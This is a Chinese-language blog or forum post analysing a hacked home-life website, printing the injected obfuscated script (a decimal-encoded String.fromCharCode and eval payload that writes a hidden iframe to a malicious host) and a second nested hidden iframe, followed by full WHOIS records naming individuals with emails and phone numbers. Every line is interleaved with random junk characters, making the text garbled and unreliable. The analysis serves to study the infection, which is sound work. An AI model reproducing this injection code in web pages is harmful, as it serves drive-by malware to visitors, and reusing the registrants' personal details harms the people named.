[原创]一篇刚写的分析木马手记

首发在我的博客里面， 4(D1/8  
4/N{~  
http://www.areway.cn/?p=175 H/^t]bg,  
sK/Z'h{|  
Qn!KL0w  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： khb/"VYd  
          \c\z 6;j  
<script>t=’60,105,102,114,97,109,101, $/FL)m8.3  
32,115,114,99,61,104,116,116,112,58,47,47, S\S31pYT  
102,114,101,101,46,117,45,117,117,117,46,99, 6k6}SlN[  
110,47,101,114,114,111,114,46,104,116,109, 0% zy 6{  
32,119,105,100,116,104,61,49,48,48,32,104, 9=}&evGm89  
101,105,103,104,116,61,48,62,60,47,105,102, 4>NmJrh  
114,97,109,101,62′; _@D"XL#L  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> CeINODcT  
                                                                                                  ws([bS2h  
<script>t=’60,105,102,114,97,109,101,32,115,  nJ|M  
114,99,61,104,116,116,112,58,47,47,102,114, 0..]c-V(G  
101,101,46,117,45,117,117,117,46,99,110,47, o^3X5})sv  
101,114,114,111,114,46,104,116,109,32,119, (7A-cC  
105,100,116,104,61,49,48,48,32,104,101,105, #/ HQ?3h]  
103,104,116,61,48,62,60,47,105,102,114,97, =`OnFdI  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); 8zrLl:{  
document.write(t);</script> FT Ytf4t  
                                                                                                  r E&}B5PN=  
<html xmlns=” $)Ty@@7C  
http://www.w3.org/1999/xhtml  jAxrU  
“> il[waUfmD  
<head> 0]Qk*u<  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> A(D3wctdr  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> ]-{A"tJ  
<title>首页 - 爱生活家庭网 X!|K 4Z!k  
                                                                                                                                                    <T`&NA@%~$  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 fn, YH  
转换字符串后的大概内容是（谁点击后果自付）： P{2j31u`  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… 5I&Dk4v  
                                                                                                                                  Sv\399(  
查询玉米u-uuu.cn的详细信息： S#b)RpY  
Domain Name: u-uuu.cn yqKSaPRA  
ROID: 20070901s10001s64972306-cn a49t/  
Domain Status: ok xp 
F(de  
Registrant Organization: 王雷 @;7Ht Z`  
Registrant Name: 王雷 B)BR y%  
Administrative Email: czlovexs@126.com ]2rCn};  
Sponsoring Registrar: 北京万网志成科技有限公司 cuh Z_l  
Name Server:ns.yovole.com NL-V",gI-~  
Name Server:ns1.yovole.com er.;qV'Wz6  
Registration Date: 2007-09-01 17:54 m1DrT>oN'  
Expiration Date: 2008-09-01 17:54 i?D)XXB85  
最后PING了一下地址 都没有什么…. |w.h97fj  
                                                                                                D77s3AyHK  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. "eIE5h  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> TGZr [  
<script language=”javascript” src=” e3WEsD+  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script >">grDX  
> ss4YeZa  
这个玉米应该有可能是木马作者的： E&;;2  
foafau.info的详细信息： XB<Q A>dLh  
Access to INFO WHOIS information is provided to assist persons in P=m l;xp  
determining the contents of a domain name registration record in the 9)$g
D  
Afilias registry database. The data in this record is provided by H`nd |  
Afilias Limited for informational purposes only, and Afilias does not *})Np0k  
guarantee its accuracy.  This service is intended only for query-based >"[Nmx0;w  
access. You agree that you will use this data only for lawful purposes \xKhbpO~  
and that, under no circumstances will you use this data to: (a) allow, 5Un)d<!7&u  
enable, or otherwise support the transmission by e-mail, telephone, or t[:G45].-k  
facsimile of mass unsolicited, commercial advertising or solicitations %&!B2z}  
to entities other than the data recipient’s own existing customers; or rw#?NI:  
(b) enable high volume, automated, electronic processes that send J~}i}|YC>  
queries or data to the systems of Registry Operator, a Registrar, or ]\F}-I[  
Afilias except as reasonably necessary to register domain names or #c(BBTuX  
modify existing registrations. All rights reserved. Afilias reserves B:6VD /qC  
the right to modify these terms at any time. By submitting this query, 0,wmEV!)  
you agree to abide by this policy. XnB-1{a1  
Domain ID:D22418703-LRMS %FJB9?9=|  
Domain Name:FOAFAU.INFO LJOJ2x  
Created On:20-Nov-2007 16:05:42 UTC fv:&?gc  
Last Updated On:20-Nov-2007 16:05:44 UTC h]WW?.  
Expiration Date:20-Nov-2008 16:05:42 UTC ,p V3O`z  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) I^m9(L4%  
Status:CLIENT DELETE PROHIBITED I\f\k>;  
Status:CLIENT RENEW PROHIBITED A\v]ZN4  
Status:CLIENT TRANSFER PROHIBITED aPin6L$;)  
Status:CLIENT UPDATE PROHIBITED J+=?taZ  
Status:TRANSFER PROHIBITED }CvhLjo  
Registrant ID:GODA-040110615 ~:N 1[  
Registrant Name:liu hong $s,(-C  
Registrant Organization: m}]\^$d  
Registrant Street1:beijing ~b})=7n.  
Registrant Street2: ztC>*SX  
Registrant Street3: \R,8xID_t  
Registrant City:beijing )PvB^n  
Registrant State/Province: _.xicov  
Registrant Postal Code:100000 ,f$ftn\~j/  
Registrant Country:CN 8@]vvZ2/gj  
Registrant Phone:+86.860108888777 XhmUtbs  
Registrant Phone Ext.: vP^V3  
Registrant FAX: R(IYb%L  
Registrant FAX Ext.: [s F/sa3  
Registrant Email:bbbshiji@163.com Hd{@e6S  
Admin ID:GODA-240110615
*z__$!LR  
Admin Name:liu hong O5ZR{f&  
Admin Organization: q{pa _  
Admin Street1:beijing Q+dLWFI  
Admin Street2: AdWP  
Admin Street3: Is>~P*2Y=  
Admin City:beijing qcoTt~\  
Admin State/Province: ;rC< C  
Admin Postal Code:100000 S'=}eeG  
Admin Country:CN Wux[h8G  
Admin Phone:+86.860108888777 hlG
rnL  
Admin Phone Ext.: LUEZqIf  
Admin FAX: /|8/C40aY  
Admin FAX Ext.: <X ([VZ  
Admin Email:bbbshiji@163.com z0?IQzR^T  
Billing ID:GODA-340110615 zE?@_p1gei  
Billing Name:liu hong 9lB$i2G>Zw  
Billing Organization: ;]_h")4"c  
Billing Street1:beijing U4h5K}j4  
Billing Street2: %(>,eee_  
Billing Street3: z)%]#QO  
Billing City:beijing ;+rcT;_^/  
Billing State/Province: "e
d A  
Billing Postal Code:100000 '1b4nj|<m  
Billing Country:CN okH*2F(-  
Billing Phone:+86.860108888777 VJgYXPE `  
Billing Phone Ext.: ?D=C8EX  
Billing FAX: ]l6niYVB2  
Billing FAX Ext.: s/Q8(sF5  
Billing Email:bbbshiji@163.com n
W:Bo#  
Tech ID:GODA-140110615 )F4BVPI  
Tech Name:liu hong Y,{pG]B$w  
Tech Organization: [p_<`gU?  
Tech Street1:beijing 2 @t?@,c  
Tech Street2: MGH2z:  
Tech Street3: ilwIqj  
Tech City:beijing u
nt{RVR%  
Tech State/Province: P9qZjBS  
Tech Postal Code:100000 m[tsG=X
BN  
Tech Country:CN SEIJ+u9XsA  
Tech Phone:+86.860108888777 yw*| HT  
Tech Phone Ext.: *V{Y.`\  
Tech FAX: KB8_yo{y  
Tech FAX Ext.: yo :63CPP  
Tech Email:bbbshiji@163.com F-GH
?sfvi  
Name Server:NS27.DOMAINCONTROL.COM [m(n-MuF  
Name Server:NS28.DOMAINCONTROL.COM (PSL[P  
Name Server: w9C?wT  
Name Server: Wx|De7*  
Name Server: uVa`2]NV r  
Name Server: YFeL#)5y  
Name Server: ))E| SAr  
Name Server: U|+c&TY
 
Name Server: 64t:  
Name Server: !&R|P|7qN}  
Name Server: a=M/0N{!  
Name Server: )jm!^m  
Name Server: z~#d@c\  
                                                                                                          9]QHwa>_|2  
接着下载每个文件里面的代码： C%AN4Mo  
一步一步看.. &+ UnPE(  
C&;m56  
_xr@dK<   
!%/(a)B$^$  
mLDuizWI  
,Gy2$mglB  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来